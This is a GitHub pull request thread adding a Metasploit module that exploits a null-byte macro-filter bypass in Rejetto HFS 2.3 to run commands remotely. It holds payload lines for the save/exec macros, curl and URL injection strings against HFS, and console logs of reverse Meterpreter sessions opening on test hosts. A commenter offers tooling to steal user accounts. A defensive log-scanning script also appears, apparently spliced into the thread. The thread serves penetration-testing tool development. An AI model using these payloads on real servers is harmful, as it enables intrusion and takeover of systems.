
Http File Server Remote Command Exec #3793

Merged
merged 10 commits into from Oct 8, 2014

Conversation

mfadzilr (Contributor)

Add "http_file_server_exec" remote exploitation module

Remote command execution bypassing the macro filters: "%00" is used to bypass the filters, and the 'save' and 'exec' macro commands create a VBS file and execute the VBS script on the target system. Please note that when using "exec", it will execute 4 times.

Notes

Tested on target host without antivirus installed.

Example Output

msf exploit(http_file_server_exec) > exploit
[*] Exploit running as background job.
msf exploit(http_file_server_exec) >
[*] Started reverse handler on 192.168.175.142:4444
[*] Using URL: http://0.0.0.0:8080/791wKD
[*] Local IP: http://192.168.175.142:8080/791wKD
[*] Server started.
[*] Sending a malicious request to /
[*] 192.168.175.134 http_file_server_exec - 192.168.175.134:80 - Payload request received: /791wKD
[*] Sending stage (769536 bytes) to 192.168.175.134
[*] Meterpreter session 5 opened (192.168.175.142:4444 -> 192.168.175.134:1335) at 2014-09-20 18:05:48 +0800
[+] Deleted c:\test\VtdVFRGk.vbs
[*] Server stopped.

msf exploit(http_file_server_exec) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > shell
Process 2072 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\pentest\Desktop>

@mfadzilr mfadzilr closed this Sep 15, 2014
@mfadzilr mfadzilr reopened this Sep 15, 2014
mubix (Contributor) commented Sep 15, 2014

Awesome module, only problem is that it pops up a ton of wscript/cmd screens on the target. Is there any reason you went for a wget-like approach to the module instead of just piping the encoded VBS over directly?

mubix (Contributor) commented Sep 15, 2014

Here is another fun option: http://hfsserver/?search=test%00\{.add%20folder|real|C:\\|Cdrive.\}"

mubix (Contributor) commented Sep 15, 2014

Did notice that when trying to use the 'append' operand, it would write the string 4 times to the file specified using the following: $ curl "http://hfsserver/?search=test%00\{.append|C:\\temp\\bob.txt|blah.\}"
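A defender-side check for the request shape described in the PR description and in mubix's comments above, as an added example that is not part of this PR or of the Metasploit module: it flags HTTP requests whose query parameter carries a null byte followed by HFS macro syntax. The log lines are constructed, and the common-log-format layout and the regexes are my assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Added detection example (not code from this PR or the Metasploit module):
# an HFS 2.3 macro smuggled past the search-field filter looks like a NUL
# byte followed by "{.name|arg|arg.}" once the query string is decoded.

# NUL, then the first macro opener and its name (e.g. "add folder").
MACRO_AFTER_NUL = re.compile(r"\x00[^{]*\{\.\s*([^|.]+?)\s*(?:\||\.\})")

# Minimal common-log-format line: client, request method and target (assumed).
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def hfs_macro_in_target(target: str):
    """Return the injected macro name if any query value contains a null
    byte followed by HFS macro syntax, otherwise None."""
    query = urlsplit(target).query
    # parse_qs percent-decodes, so "%00" becomes a real "\x00" here.
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            m = MACRO_AFTER_NUL.search(value)
            if m:
                return m.group(1)
    return None


def scan_log(lines):
    """Return (client_ip, macro_name, raw_target) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _method, target = m.groups()
        macro = hfs_macro_in_target(target)
        if macro:
            hits.append((client, macro, target))
    return hits


# Constructed sample traffic (not real logs); the two injected requests use
# the URL shapes quoted in the thread, the last one is a macro without the NUL.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Sep/2014:10:00:01 +0000] "GET /?search=report.pdf HTTP/1.1" 200 512',
    r'10.0.0.9 - - [15/Sep/2014:10:00:02 +0000] "GET /?search=test%00{.add%20folder|real|C:\\|Cdrive.} HTTP/1.1" 200 7',
    r'10.0.0.9 - - [15/Sep/2014:10:00:03 +0000] "GET /?search=test%00{.append|C:\\temp\\bob.txt|blah.} HTTP/1.1" 200 7',
    '10.0.0.7 - - [15/Sep/2014:10:00:04 +0000] "GET /?search=%7B.time.%7D HTTP/1.1" 200 7',
]
```

Running `scan_log(SAMPLE_LOG)` reports the two requests from 10.0.0.9 and ignores the plain search and the macro that lacks the null-byte bypass.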


payloads = [
"save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Change this line to:
"exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}"
And there won't be any more popups during execution (no need to start cmd.exe especially if you use the filename and extension)

mfadzilr (Contributor, Author)

Works perfectly, thanks mubix.

mubix (Contributor) commented Sep 15, 2014

Made some updates to push a file instead of pulling it: https://gist.github.com/mubix/b855d8045a6112a937a7 It's REALLY ugly, don't use it as gospel, but it's just another option.

Review comment on:

'uri' => '/'
})

if res.headers['Server'] =~ /HFS 2.3/

Contributor:

The correct regex should be:

/HFS 2\.3/

wchen-r7 (Contributor)

The CmdStager approach would be the most appropriate implementation.

mubix (Contributor) commented Sep 15, 2014

@wchen-r7 can't use the standard CmdStager because it issues every command 4 times, and the greater-than seems like a bad character. (I haven't tried < yet.)

wchen-r7 (Contributor)

@mubix No, I mean your approach is correct.

mfadzilr (Contributor, Author)

I tried the CmdStager option; I can't seem to make it less noisy, as popups are flying over the screen. The code is here: https://gist.github.com/mfadzilr/6b8fbc3ce9ee89623585, most of it taken from mubix's approach.

ghost commented Oct 6, 2014

Hi, I'm the author of this vulnerability. If you need, I can provide you my framework with full features like disable log, steal user account, and many more :), contact me on gmail danielelinguaglossa@gmail.com

jvazquez-r7 (Contributor)

Since it has been quiet for some days, and it looks like there were new commits trying to address feedback, I'm going to pick it up! If someone is working on it, or interested in it, please warn here! :) Verification in progress in the meanwhile!

@jvazquez-r7 jvazquez-r7 self-assigned this Oct 8, 2014
@jvazquez-r7 jvazquez-r7 merged commit a2a2ca5 into rapid7:master Oct 8, 2014
jvazquez-r7 added a commit that referenced this pull request Oct 8, 2014
jvazquez-r7 (Contributor)

Landed after some clean up, see final result here: 411f6c8

Test:

msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > set rhost 172.16.158.131
rhost => 172.16.158.131
msf exploit(rejetto_hfs_exec) > check
[*] 172.16.158.131:80 - The target service is running, but could not be validated.
msf exploit(rejetto_hfs_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Using URL: http://0.0.0.0:8080/ioMapl7dz
[*]  Local IP: http://10.6.0.90:8080/ioMapl7dz
[*] Server started.
[*] Sending a malicious request to /
[*] 172.16.158.131   rejetto_hfs_exec - 172.16.158.131:80 - Payload request received: /ioMapl7dz
[*] Sending stage (769536 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:1152) at 2014-10-08 12:12:53 -0500
[+] Deleted %TEMP%\ODdmpVxzusEV.vbs
[*] Server stopped.

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.131 - Meterpreter session 1 closed.  Reason: User exit

Thanks @mfadzilr for the module, awesome work!

mfadzilr (Contributor, Author) commented Oct 8, 2014

Great news, thank you very much.

@mfadzilr mfadzilr deleted the http_file_server_module branch October 9, 2014 10:02